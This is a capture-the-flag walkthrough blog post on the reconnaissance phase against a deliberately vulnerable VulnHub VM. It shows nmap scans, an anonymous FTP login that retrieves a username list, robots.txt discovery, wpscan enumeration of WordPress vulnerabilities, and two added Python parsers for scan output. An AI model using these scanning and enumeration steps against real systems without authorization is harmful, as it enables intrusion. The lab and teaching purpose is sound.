#HackOnTuesday Episode 9: How to hack the Bsides Vancouver 2018 CTF VM (Part 1)

Hello everyone and welcome back to another episode of the #HackOnTuesday video series. Today, we will take a look at the vulnerable VM released by Mohamed Shahat (@abatchy17, https://twitter.com/@abatchy17) at the BSides Vancouver 2018.

This VM can be downloaded from VulnHub (https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/).

Going through the description provided by Mohamed, we don’t get any hints about the VM or the challenges. So, let’s fire up VirtualBox and take a closer look at the BSides Vancouver 2018 vulnerable VM.

The login prompt doesn’t contain any hints, which means we will need to collect information about the target the old way: with netdiscover, nmap, and the rest of our favorite tools.

So, let’s fire up our Kali machine and look for the vulnerable VM’s IP.
root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.10.4 netmask 255.255.255.0 broadcast 192.168.10.255
inet6 fe80::a00:27ff:fe54:5f84 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:54:5f:84 txqueuelen 1000 (Ethernet)
RX packets 47 bytes 6764 (6.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24 bytes 2364 (2.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 40 bytes 2720 (2.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 40 bytes 2720 (2.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Our IP address in this case is 192.168.10.4, and because our Kali machine is attached to the same VirtualBox “host-only adapter” as the vulnerable VM, the IP of the vulnerable VM is very likely in the same subnet.

To find the vulnerable VM’s IP address, we can use a multitude of tools. Here is how to do it with nmap.
root@kali:~/pentest# nmap -sn 192.168.10.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 03:36 PST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.10.1
Host is up (0.00018s latency).
MAC Address: 0A:00:27:00:00:19 (Unknown)
Nmap scan report for 192.168.10.2
Host is up (0.00023s latency).
MAC Address: 08:00:27:62:DD:50 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.10.4
Host is up (0.00024s latency).
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.10.3
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.96 seconds

As we can see from nmap’s output, there are only two machines with a VirtualBox virtual NIC: the machine 192.168.10.3 and the machine 192.168.10.4. Since our IP is 192.168.10.4, the IP address of the vulnerable machine is 192.168.10.3.
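Picking the target out of a ping sweep by eye works for four hosts, but not for a /24 full of VMs. The following added example (my own code, not part of the original post) parses the normal-format output of nmap -sn into a small host inventory and filters it by MAC vendor, excluding the scanner’s own address. The sample text is constructed to mirror the sweep shown above; a host without a MAC line is usually the scanning machine itself or a host that was not reachable over the local Ethernet segment.

```python
# Added example (not from the original post): parse `nmap -sn` normal output
# into a host inventory so the target can be selected by MAC vendor.
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample mirroring the ping sweep shown in the post.
SAMPLE_SWEEP = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 03:36 PST
Nmap scan report for 192.168.10.1
Host is up (0.00018s latency).
MAC Address: 0A:00:27:00:00:19 (Unknown)
Nmap scan report for 192.168.10.2
Host is up (0.00023s latency).
MAC Address: 08:00:27:62:DD:50 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.10.4
Host is up (0.00024s latency).
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.10.3
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.96 seconds
"""


@dataclass
class Host:
    ip: str
    mac: Optional[str] = None      # None when nmap printed no MAC line
    vendor: Optional[str] = None


# "Nmap scan report for 1.2.3.4" or "Nmap scan report for name (1.2.3.4)"
REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d+\.\d+\.\d+\.\d+)\)?$")
MAC_RE = re.compile(r"^MAC Address: (?P<mac>[0-9A-F:]{17}) \((?P<vendor>[^)]*)\)$")


def parse_ping_sweep(text: str) -> List[Host]:
    """Return one Host per 'Nmap scan report' block, in output order."""
    hosts: List[Host] = []
    current: Optional[Host] = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = Host(ip=m.group("ip"))
            hosts.append(current)
            continue
        m = MAC_RE.match(line)
        if m and current is not None:
            current.mac = m.group("mac")
            current.vendor = m.group("vendor")
    return hosts


def hosts_by_vendor(hosts: List[Host], needle: str,
                    exclude_ip: Optional[str] = None) -> List[str]:
    """IPs whose MAC vendor string contains `needle`, minus our own address."""
    return [h.ip for h in hosts
            if h.vendor and needle.lower() in h.vendor.lower()
            and h.ip != exclude_ip]


if __name__ == "__main__":
    inventory = parse_ping_sweep(SAMPLE_SWEEP)
    for h in inventory:
        print(f"{h.ip:15} {h.mac or '-':17} {h.vendor or '-'}")
    print("VirtualBox guests:", hosts_by_vendor(inventory, "VirtualBox",
                                                exclude_ip="192.168.10.4"))
```

The same parser works on a sweep of a larger range; `-oG` or `-oX` output would be more robust to format changes, but the normal output is what this write-up shows, so that is what the parser reads.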

With the IP address of the vulnerable VM, the next step is to identify the open ports on that machine. Once again, nmap is a great tool to do that.

For this test, we can take advantage of the -A option, although in a real engagement we would probably not enable OS detection, version detection, script scanning, and traceroute all at once, because it would attract too much attention.

root@kali:~# nmap -Pn -n -A 192.168.10.3 -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 05:17 PST
Nmap scan report for 192.168.10.3
Host is up (0.00064s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.10.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
| 2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_ 256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms 192.168.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.25 seconds

Well well well, there is a lot of interesting and juicy information in nmap’s output. First of all, the vulnerable VM seems to have 3 open ports: 21, 22, and 80, running vsftpd, OpenSSH, and Apache respectively.

At first sight the software versions don’t seem to have known remote exploits, but there seems to be a lot going on: anonymous FTP login is allowed and the robots.txt file contains an interesting folder. So, let’s take a closer look at each finding, starting from the first one: the allowed anonymous FTP login.
root@kali:~# ftp 192.168.10.3
Connected to 192.168.10.3.
220 (vsFTPd 2.3.5)
Name (192.168.10.3:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
226 Directory send OK.
ftp> cd public
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 31 Mar 03 2018 users.txt.bk
226 Directory send OK.

Wow! It looks like we have a potentially interesting file: the users.txt.bk (probably a backup file). Let’s download it and see what it contains.

ftp> get users.txt.bk
local: users.txt.bk remote: users.txt.bk
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for users.txt.bk (31 bytes).
226 Transfer complete.
31 bytes received in 0.00 secs (10.0409 kB/s)
ftp> quit
221 Goodbye.
root@kali:~/pentest# cat users.txt.bk
abatchy
john
mai
anne
doomguy

Not surprisingly, it contains a list of users: five users that probably have an account somewhere on this machine. Since there is nothing else in the public folder, we can turn our attention to the robots.txt file found by nmap.

Apparently, there is a folder that the system administrator doesn’t want us to see: backup_wordpress. If we browse there, we find a WordPress installation, which is great because it could be our way in.
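nmap’s http-robots.txt script only prints the disallowed entries; the added example below (my own code, not from the post or from nmap) is a minimal robots.txt parser that keeps the rules per user-agent group and applies the usual longest-match precedence. The file content is constructed to resemble the single entry found on the VM, and wildcard syntax (`*`, `$`) is deliberately not handled. The point for a defender is that a Disallow line only steers well-behaved crawlers; it hides nothing from a visitor who reads the file and goes there anyway, which is exactly what happened here.

```python
# Added example (not from the original post): a small robots.txt parser with
# per-user-agent rule groups and longest-match evaluation (no wildcard support).
from typing import Dict, List, Tuple

Rule = Tuple[str, str]  # (directive, path), directive is "allow" or "disallow"

# Constructed sample modelled on the robots.txt reported by nmap above.
SAMPLE_ROBOTS = """\
# constructed sample
User-agent: *
Disallow: /backup_wordpress
Allow: /backup_wordpress/readme.html
"""


def parse_robots(text: str) -> Dict[str, List[Rule]]:
    """Return {user_agent: [(directive, path), ...]} in file order."""
    groups: Dict[str, List[Rule]] = {}
    agents: List[str] = []          # user-agents of the group being filled
    last_was_rule = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and whitespace
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if last_was_rule:       # a User-agent after rules starts a new group
                agents = []
            agents.append(value)
            groups.setdefault(value, [])
            last_was_rule = False
        elif field in ("allow", "disallow") and agents:   # rules before any group are ignored
            for agent in agents:
                groups[agent].append((field, value))
            last_was_rule = True
    return groups


def disallowed_paths(groups: Dict[str, List[Rule]], agent: str = "*") -> List[str]:
    """The path hints an attacker reads out of the file: non-empty Disallow values."""
    return [path for directive, path in groups.get(agent, []) if directive == "disallow" and path]


def crawl_allowed(groups: Dict[str, List[Rule]], path: str, agent: str = "*") -> bool:
    """Longest matching rule wins; Allow wins a tie; no matching rule means allowed."""
    best_len, allowed = -1, True
    for directive, rule_path in groups.get(agent, []):
        if not rule_path:           # 'Disallow:' with an empty value allows everything
            continue
        if path.startswith(rule_path):
            is_allow = directive == "allow"
            if len(rule_path) > best_len or (len(rule_path) == best_len and is_allow):
                best_len, allowed = len(rule_path), is_allow
    return allowed


if __name__ == "__main__":
    groups = parse_robots(SAMPLE_ROBOTS)
    print("Disallowed for *:", disallowed_paths(groups))
    for p in ("/backup_wordpress/wp-login.php", "/backup_wordpress/readme.html", "/index.html"):
        print(f"{p}: crawlers {'may' if crawl_allowed(groups, p) else 'may not'} fetch")
```

Nothing in `crawl_allowed` is enforced by the web server; the real fix for a directory that must not be reachable is to remove it or put an access control in front of it, not to list it in robots.txt.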

To get an idea of how secure it is, we will use wpscan.

root@kali:~/pentest# wpscan --url 192.168.10.3/backup_wordpress --enumerate ap --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.4.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.10.3/backup_wordpress/
[+] Started: Tue Feb 19 10:43:04 2019

Interesting Finding(s):

[+] http://192.168.10.3/backup_wordpress/
| Interesting Entries:
| - Server: Apache/2.2.22 (Ubuntu)
| - X-Powered-By: PHP/5.3.10-1ubuntu3.26
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.10.3/backup_wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.10.3/backup_wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] WordPress version 4.5 identified (Insecure, released on 2016-04-12).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.10.3/backup_wordpress/?feed=rss2, <generator>https://wordpress.org/?v=4.5</generator>
| - http://192.168.10.3/backup_wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.5</generator>
|
| [!] 51 vulnerabilities identified:
|
| [!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
| Fixed in: 4.5.2
| References:
| - https://wpvulndb.com/vulnerabilities/8488
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
| - https://wordpress.org/news/2016/05/wordpress-4-5-2/
| - https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
| - https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
|
| [!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
| Fixed in: 4.5.2
| References:
| - https://wpvulndb.com/vulnerabilities/8489
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
| - https://wordpress.org/news/2016/05/wordpress-4-5-2/
| - https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
| - https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
|
| [!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
| Fixed in: 4.5.3
| References:
| - https://wpvulndb.com/vulnerabilities/8518
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
| - https://wordpress.org/news/2016/06/wordpress-4-5-3/
| - https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
|
| [!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
| Fixed in: 4.5.3
| References:
| - https://wpvulndb.com/vulnerabilities/8519
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
| - https://wordpress.org/news/2016/06/wordpress-4-5-3/
| - https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
| - https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
|
| [!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
| Fixed in: 4.5.3
| References:
| - https://wpvulndb.com/vulnerabilities/8520
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
| - https://wordpress.org/news/2016/06/wordpress-4-5-3/
| - https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
|
| [!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
| Fixed in: 4.5.4
| References:
| - https://wpvulndb.com/vulnerabilities/8615
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
| - https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
| - https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
| - http://seclists.org/fulldisclosure/2016/Sep/6
|
| [!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
| Fixed in: 4.5.4
| References:
| - https://wpvulndb.com/vulnerabilities/8616
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
| - https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
|
| [!] Title: WordPress 4.3-4.7 - Remote Code Execution (RCE) in PHPMailer
| Fixed in: 4.7.1
| References:
| - https://wpvulndb.com/vulnerabilities/8714
| - https://www.wordfence.com/blog/2016/12/phpmailer-vulnerability/
| - https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/24767c76d359231642b0ab48437b64e8c6c7f491
| - http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_phpmailer_host_header
|
| [!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8716
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
| - https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
|
| [!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8718
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
| - https://www.mehmetince.net/low-severity-wordpress/
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
|
| [!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8719
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
| - https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
|
| [!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8720
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
| - https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
|
| [!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8721
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
| - https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
|
| [!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
| Fixed in: 4.5.6
| References:
| - https://wpvulndb.com/vulnerabilities/8729
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
| - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
| - https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
|
| [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
| Fixed in: 4.5.6
| References:
| - https://wpvulndb.com/vulnerabilities/8730
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
| - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
| - https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
|
| [!] Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table
| Fixed in: 4.5.6
| References:
| - https://wpvulndb.com/vulnerabilities/8731
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5612
| - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
| - https://github.com/WordPress/WordPress/commit/4482f9207027de8f36630737ae085110896ea849
|
| [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
| Fixed in: 4.5.7
| References:
| - https://wpvulndb.com/vulnerabilities/8765
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
| - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
| - https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
| - http://seclists.org/oss-sec/2017/q1/563
|
| [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
| Fixed in: 4.5.7
| References:
| - https://wpvulndb.com/vulnerabilities/8766
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
| - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
|
| [!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
| Fixed in: 4.5.7
| References:
| - https://wpvulndb.com/vulnerabilities/8768
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
| - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
| - https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
|
| [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
| Fixed in: 4.5.7
| References:
| - https://wpvulndb.com/vulnerabilities/8770
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
| - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
| - https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
| - http://seclists.org/oss-sec/2017/q1/562
| - https://hackerone.com/reports/153093
|
| [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
| References:
| - https://wpvulndb.com/vulnerabilities/8807
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
| - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
| - http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
| - https://core.trac.wordpress.org/ticket/25239
|
| [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8815
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
| - https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
|
| [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8816
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
|
| [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8817
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
|
| [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8818
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
| - https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
|
| [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8819
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
| - https://hackerone.com/reports/203515
| - https://hackerone.com/reports/203515
|
| [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8820
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
|
| [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8905
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
| - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
|
| [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
| Fixed in: 4.7.5
| References:
| - https://wpvulndb.com/vulnerabilities/8906
| - https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
| - https://wpvulndb.com/vulnerabilities/8905
|
| [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8910
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41398
|
| [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8911
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41457
|
| [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8913
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41448
|
| [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8914
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41395
| - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
|
| [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
| Fixed in: 4.5.11
| References:
| - https://wpvulndb.com/vulnerabilities/8941
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
| - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
| - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
| - https://twitter.com/ircmaxell/status/923662170092638208
| - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
|
